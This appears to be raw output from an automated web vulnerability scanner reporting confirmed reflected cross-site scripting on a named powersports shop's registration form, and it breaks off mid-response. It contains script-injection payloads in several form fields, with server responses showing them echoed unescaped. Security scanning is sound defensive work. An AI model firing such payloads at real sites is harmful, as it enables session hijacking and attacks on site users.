User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 373
Accept-Encoding: gzip, deflate

cmbAdvert=1&Register=Register&txtAddress1=3&txtAddress2=3&txtAltPhone=3&txtBusinessName=Smith&txtCity=3&txtCountry=3&txtEmail=netsparker%40example.com&txtFax=3&txtFirstName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000145)%3c%2fscript%3e&txtHint=3&txtLastName=Smith&txtMiddleIntial=3&txtpassword=3&txtpassword2=3&txtPhone=3&txtState=AB&txtZip=3&Type=42

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:26:09 GMT
Content-Length: 12518
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="'"--></style></script><script>netsparker(0x000145)</script>"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB" selected>AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1" Selected>Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7"></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST 1
Register POST Register
txtAddress1 POST 3
txtAddress2 POST 3
txtAltPhone POST 3
txtBusinessName POST Smith
txtCity POST 3
txtCountry POST 3
txtEmail POST netsparker@example.com
txtFax POST 3
txtFirstName POST Smith
txtHint POST '"--></style></script><script>alert(0x000146)</script>
txtLastName POST Smith
txtMiddleIntial POST 3
txtpassword POST 3
txtpassword2 POST 3
txtPhone POST 3
txtState POST AB
txtZip POST 3
Type POST 42

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 377
Accept-Encoding: gzip, deflate

cmbAdvert=1&Register=Register&txtAddress1=3&txtAddress2=3&txtAltPhone=3&txtBusinessName=Smith&txtCity=3&txtCountry=3&txtEmail=netsparker%40example.com&txtFax=3&txtFirstName=Smith&txtHint='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000146)%3c%2fscript%3e&txtLastName=Smith&txtMiddleIntial=3&txtpassword=3&txtpassword2=3&txtPhone=3&txtState=AB&txtZip=3&Type=42

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:26:49 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="'"--></style></script><script>netsparker(0x000146)</script>">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB" selected>AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1" Selected>Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7"></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST 1
Register POST Register
txtAddress1 POST 3
txtAddress2 POST 3
txtAltPhone POST 3
txtBusinessName POST Smith
txtCity POST 3
txtCountry POST 3
txtEmail POST netsparker@example.com
txtFax POST 3
txtFirstName POST Smith
txtHint POST 3
txtLastName POST '"--></style></script><script>alert(0x000147)</script>
txtMiddleIntial POST 3
txtpassword POST 3
txtpassword2 POST 3
txtPhone POST 3
txtState POST AB
txtZip POST 3
Type POST 42

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 373
Accept-Encoding: gzip, deflate

cmbAdvert=1&Register=Register&txtAddress1=3&txtAddress2=3&txtAltPhone=3&txtBusinessName=Smith&txtCity=3&txtCountry=3&txtEmail=netsparker%40example.com&txtFax=3&txtFirstName=Smith&txtHint=3&txtLastName='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000147)%3c%2fscript%3e&txtMiddleIntial=3&txtpassword=3&txtpassword2=3&txtPhone=3&txtState=AB&txtZip=3&Type=42

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:26:53 GMT
Content-Length: 12518
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="'"--></style></script><script>netsparker(0x000147)</script>"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB" selected>AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
